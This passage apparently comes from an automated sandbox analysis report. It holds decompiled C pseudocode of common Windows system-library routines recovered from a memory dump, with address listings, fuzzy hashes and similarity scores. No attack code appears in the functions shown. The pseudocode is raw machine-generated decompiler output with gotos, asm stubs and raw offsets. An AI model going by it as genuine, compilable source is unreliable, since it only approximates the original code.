										L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E050C95D0();
										L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E050BF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x050852a5
0x050852ad
0x050852b0
0x050852b3
0x050852b7
0x050852ba
0x050852bf
0x050852c4
0x050852cc
0x00000000
0x00000000
0x050852ce
0x050852d9
0x050852dd
0x050852e7
0x050852f7
0x050852f9
0x050852fd
0x050e0dcf
0x050e0dd5
0x050e0dd6
0x050e0dd7
0x050e0dd8
0x050e0dd9
0x050e0dde
0x050e0ddf
0x050e0de0
0x050e0de1
0x050e0de2
0x050e0de5
0x050e0dea
0x050e0dec
0x050e0f60
0x050e0f64
0x050e0f70
0x050e0f76
0x050e0f79
0x050e0f79
0x00000000
0x050e0f64
0x050e0df2
0x050e0df7
0x050e0e04
0x050e0e0d
0x050e0e0d
0x050e0e10
0x050e0e1a
0x050e0e1c
0x050e0e4c
0x050e0e52
0x050e0e61
0x050e0e67
0x050e0e6b
0x050e0e70
0x050e0e76
0x050e0ed7
0x050e0edc
0x050e0ee0
0x050e0ee6
0x050e0eea
0x050e0eed
0x050e0ef0
0x050e0ef3
0x050e0ef6
0x050e0ef9
0x050e0efe
0x050e0f01
0x050e0f01
0x050e0f0b
0x050e0f12
0x050e0f16
0x050e0f18
0x050e0f1b
0x050e0f2c
0x050e0f31
0x050e0f31
0x050e0f35
0x050e0f39
0x050e0f3a
0x050e0f3c
0x050e0f3f
0x050e0f50
0x050e0f55
0x050e0f55
0x050e0f59
0x050852eb
0x050852f1
0x050852f1
0x050e0e7d
0x050e0e84
0x050e0e88
0x050e0e8a
0x050e0e8d
0x050e0e9e
0x050e0ea3
0x050e0ea3
0x050e0ea7
0x050e0eaf
0x050e0eb3
0x050e0eb9
0x050e0eb9
0x050e0ebc
0x050e0ecd
0x050e0ecd
0x00000000
0x050e0eb3
0x050e0e21
0x050e0e2b
0x050e0e2f
0x050e0e30
0x050e0e3a
0x050e0e3f
0x050e0e41
0x00000000
0x00000000
0x050e0e47
0x00000000
0x050e0e47
0x050e0df9
0x050e0dfe
0x00000000
0x00000000
0x00000000
0x050e0dfe
0x05085303
0x05085307
0x00000000
0x05085309
0x00000000
0x05085309
0x05085307
0x050852e9
0x050852e9
0x00000000
0x050852e9
0x0508530e
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78f02ecca23a5384b4e51c9820ed0469b58e28ed94177571bbb5879f62e72f3
Instruction ID: 5fa55e633993850a7f0403a2f607c76e6a1839416b58a6c9cf7a51e2e327e450
Opcode Fuzzy Hash: f78f02ecca23a5384b4e51c9820ed0469b58e28ed94177571bbb5879f62e72f3
Instruction Fuzzy Hash: 3951A931205742AFDB21EF68E949B6FBBE5FF50710F20091EE49587691EBB0E844C792

Uniqueness

Uniqueness Score: -1.00%

Function 050B2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x5178204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x5178208; // 0x5178207
				_t8 = _t57 + 0x5178208; // 0x5178207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x5178450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x517821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x5176d5c; // 0x7f310654
							_t72 =  *0x5176d5c; // 0x7f310654
							_t75 =  *0x5176d5c; // 0x7f310654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x5176d5c; // 0x7f310654
							_t84 =  *0x5176d5c; // 0x7f310654
							_t87 =  *0x5176d5c; // 0x7f310654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E050CF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x050b2ae4
0x050b2aec
0x050b2aef
0x050b2af4
0x050b2af7
0x050b2afd
0x050b2b92
0x050b2b92
0x050b2b97
0x050b2b9c
0x050b2b9c
0x050b2b03
0x050b2b06
0x050b2b09
0x050b2b09
0x050b2b0f
0x050b2b15
0x050b2b15
0x050b2b1b
0x050b2b1e
0x050b2b21
0x050b2b26
0x050b2b29
0x050b2b81
0x050b2b84
0x050b2c0e
0x050b2c15
0x050b2c24
0x050b2c24
0x050b2b8a
0x050b2b8a
0x050b2b8a
0x050b2b8a
0x050b2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x050b2b4a
0x050b2b4a
0x050b2b4d
0x050b2b53
0x00000000
0x00000000
0x050b2b55
0x050b2b58
0x050b2bb7
0x050f5d1b
0x050f5d37
0x050f5d47
0x050f5d53
0x050b2bbd
0x050b2bbd
0x050b2bbd
0x050b2bb7
0x050b2b5d
0x050b2c2f
0x050f5d5b
0x050f5d77
0x050f5d87
0x050f5d93
0x050b2c35
0x050b2c35
0x050b2c35
0x050b2c2f
0x050b2b65
0x050b2b9f
0x050b2ba2
0x050b2b67
0x050b2b67
0x050b2b69
0x050b2b6b
0x050b2b6e
0x050b2bc9
0x050b2bcc
0x050b2bcf
0x050b2bd4
0x050b2bd6
0x050b2bd6
0x050b2bdb
0x050b2c02
0x050b2c05
0x050b2c07
0x00000000
0x050b2c07
0x050b2be0
0x050b2c00
0x050b2c3f
0x050b2c3f
0x00000000
0x050b2c00
0x050b2be5
0x050b2be7
0x050b2bec
0x050b2bf4
0x050b2bf6
0x00000000
0x050b2bf6
0x050b2b70
0x050b2b76
0x050b2b2b
0x050b2b2b
0x050b2b2d
0x050b2b2f
0x050b2b32
0x050b2b35
0x050b2b3a
0x00000000
0x050b2b40
0x050b2b43
0x050b2b45
0x050b2b47
0x050b2b4a
0x050b2b4d
0x050b2b53
0x00000000
0x00000000
0x00000000
0x050b2b53
0x050b2b78
0x050b2b78
0x050b2b7b
0x050b2b7e
0x00000000
0x050b2b7e
0x050b2b76
0x050b2ba5
0x050b2ba5
0x050b2ba8
0x050b2bad
0x00000000
0x00000000
0x050b2baf
0x050b2baf
0x050b2bc2
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e19b9a956079eb1a28bb40eb0997a0f9e42d1eb98a9107713428a9a4ff4568
Instruction ID: 4da8382ea3cb9118f934393256477d1bfe0d17cd8d16df7bd11655e0b0b9db91
Opcode Fuzzy Hash: e2e19b9a956079eb1a28bb40eb0997a0f9e42d1eb98a9107713428a9a4ff4568
Instruction Fuzzy Hash: C151B07AA1012ADFDB14CF1CD8D0DFDB7B2FB88700715845AE8469B351DB74AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0509EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0509EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E05089080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E05082D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0509ef4b
0x0509ef4d
0x0509ef57
0x0509f0bd
0x0509f0c2
0x0509f0d2
0x0509f0d2
0x0509f0c2
0x0509ef5d
0x0509ef5f
0x0509ef67
0x0509ef6a
0x0509ef6d
0x0509ef74
0x0509ef7f
0x0509ef82
0x0509ef82
0x0509ef86
0x0509ef88
0x0509ef8c
0x0509ef8f
0x0509ef8f
0x0509ef8f
0x00000000
0x0509ef91
0x0509ef93
0x0509efc4
0x0509efc4
0x0509efc4
0x0509efca
0x0509efd0
0x0509f0a6
0x00000000
0x00000000
0x0509f0af
0x050ebb06
0x050ebb0a
0x0509f0b5
0x0509f0b5
0x0509f0b5
0x0509f0b5
0x00000000
0x0509efd6
0x0509efd9
0x0509f0de
0x0509f0e2
0x0509efdf
0x0509efdf
0x0509efdf
0x0509efe5
0x050ebafc
0x050ebafc
0x0509efe5
0x0509efeb
0x0509efed
0x0509f00f
0x0509f011
0x0509f01a
0x0509f01d
0x0509f021
0x0509f028
0x0509f029
0x0509f029
0x0509f02c
0x00000000
0x0509f02c
0x0509eff3
0x0509eff9
0x0509f0ea
0x0509f0ed
0x0509f0ef
0x00000000
0x0509f0ef
0x0509f003
0x050ebb12
0x0509f045
0x0509f049
0x0509f051
0x0509f09e
0x0509f0a0
0x0509f0a0
0x0509f09e
0x0509f053
0x0509f064
0x0509f064
0x0509f06b
0x050ebb1a
0x050ebb1a
0x0509f071
0x0509f071
0x0509f07d
0x0509f082
0x0509f08f
0x0509f08f
0x0509f009
0x0509f00d
0x00000000
0x0509f00d
0x0509efd0
0x0509ef97
0x0509efa5
0x0509efaa
0x00000000
0x0509efac
0x0509efac
0x0509efac
0x00000000
0x0509efb2
0x0509f036
0x0509f03a
0x0509f040
0x0509f090
0x00000000
0x0509f092
0x0509f042
0x00000000
0x0509f042
0x0509efb7
0x0509efb9
0x0509efbc
0x0509efb0
0x0509efb0
0x00000000
0x0509efbe
0x0509efbe
0x0509efc1
0x00000000
0x0509efc1
0x0509efbc
0x0509efaa
0x0509ef91

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: a082f930f6c0ab74ed61591d1df51945e54616d7abee4f1abc9ece1092bfeba5
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 4F512530A0424ADFDF19CB68E095BFEBBF6BF45314F2881A9D44593285C375A988E741

Uniqueness

Uniqueness Score: -1.00%

Function 0515740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0515740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E050DD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E050CF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L050A4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L050A4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E050CF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L050A4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0515740d
0x0515740d
0x05157412
0x05157413
0x05157416
0x05157418
0x0515741c
0x0515741f
0x05157422
0x05157422
0x05157428
0x0515742a
0x0515742a
0x05157451
0x05157432
0x0515744f
0x0515744f
0x00000000
0x05157434
0x05157438
0x05157443
0x05157517
0x05157517
0x0515751a
0x05157535
0x05157520
0x05157527
0x0515752c
0x05157531
0x05157533
0x00000000
0x05157533
0x00000000
0x05157531
0x0515754b
0x0515754f
0x0515755c
0x0515755c
0x0515755f
0x05157560
0x05157561
0x05157562
0x05157563
0x05157568
0x0515756a
0x0515756c
0x0515756d
0x0515756d
0x0515756f
0x05157572
0x05157574
0x05157577
0x0515757c
0x0515757f
0x00000000
0x05157551
0x05157551
0x05157551
0x05157553
0x05157553
0x05157449
0x05157449
0x0515744c
0x0515744c
0x00000000
0x0515744c
0x05157443
0x0515750e
0x05157514
0x05157514
0x05157455
0x05157469
0x0515746d
0x00000000
0x05157473
0x05157473
0x05157476
0x05157480
0x05157484
0x0515748e
0x05157493
0x05157493
0x05157496
0x05157499
0x051574a1
0x051574b1
0x051574b5
0x00000000
0x051574bb
0x051574c1
0x051574c1
0x051574c4
0x051574c5
0x051574c6
0x051574c7
0x051574c8
0x051574cd
0x00000000
0x051574d3
0x051574d3
0x051574d6
0x051574d8
0x051574db
0x051574dd
0x051574e0
0x051574e7
0x051574ee
0x051574ee
0x051574f4
0x051574f9
0x00000000
0x051574fb
0x051574fb
0x051574fd
0x05157500
0x05157503
0x05157505
0x05157505
0x051574f9
0x00000000
0x051574cd
0x051574b5
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 3e41331f744d876fae6f391128e0448aea0c6c8ece38badeabf638e57cbc98c3
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 3E518B71600606EFCB26CF54D481B96BBB6FF45354F15C0AAE908DF252E371E946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050B2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E050B2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x515ff00);
				E050DD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5061664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E050CE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5061668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E051051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x506166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E050B2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E05096600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E050B2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0509EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
